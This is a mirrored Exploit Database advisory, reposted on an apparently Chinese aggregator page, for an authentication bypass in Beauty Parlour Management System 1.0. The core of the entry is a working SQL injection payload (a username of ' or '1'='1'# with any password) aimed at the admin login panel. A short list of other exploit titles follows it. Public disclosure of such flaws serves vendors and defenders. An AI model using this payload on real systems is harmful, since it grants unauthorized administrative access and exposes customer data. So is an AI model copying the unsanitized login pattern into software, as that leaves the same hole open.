Beauty Parlour Management System 1.0 – Authentication Bypass

Exploit Database
14 阅读

作者： Prof. Kailas PATIL

日期： 2020-06-18
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/48605/

# Exploit Title: Beauty Parlour Management System 1.0 - Authentication Bypass
# Google Dork: N/A
# Exploit Author: Prof. Kailas PATIL(krp)
# Date: 2020-06-18
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/
# Version: v1.0
# Category: Webapps
# Tested on: LAMP for Linux

# Description:
# Password and username parameters have sql injection vulnerability in Admin login panel.
# 
#------------------------------------------------------
# 
# Login Link:http://localhost/bpms/admin/index.php
# 	username: ' or '1'='1'#
#	password: blah123
# 
#------------------------------------------------------

last Exploits
Beauty Parlour Management System 1.0 – Authentication Bypass的更多信息

Web Server Creator Web Portal 0.1 – Multiple Vulnerabilities：
FuseTalk Forums 3.2 – ‘windowed’ Cross-Site Scripting：
Hestia Control Panel 1.3.2 – Arbitrary File Write：
Pinterestclones – Security Bypass / HTML Injection：
WordPress Plugin Auctions 1.8.8 – ‘wpa_id’ SQL Injection：
PHP Bible Search – ‘bible.php?chapter’ SQL Injection：
Apache Syncope 2.0.7 – Remote Code Execution：
SchuldnerBeratung – SQL Injection：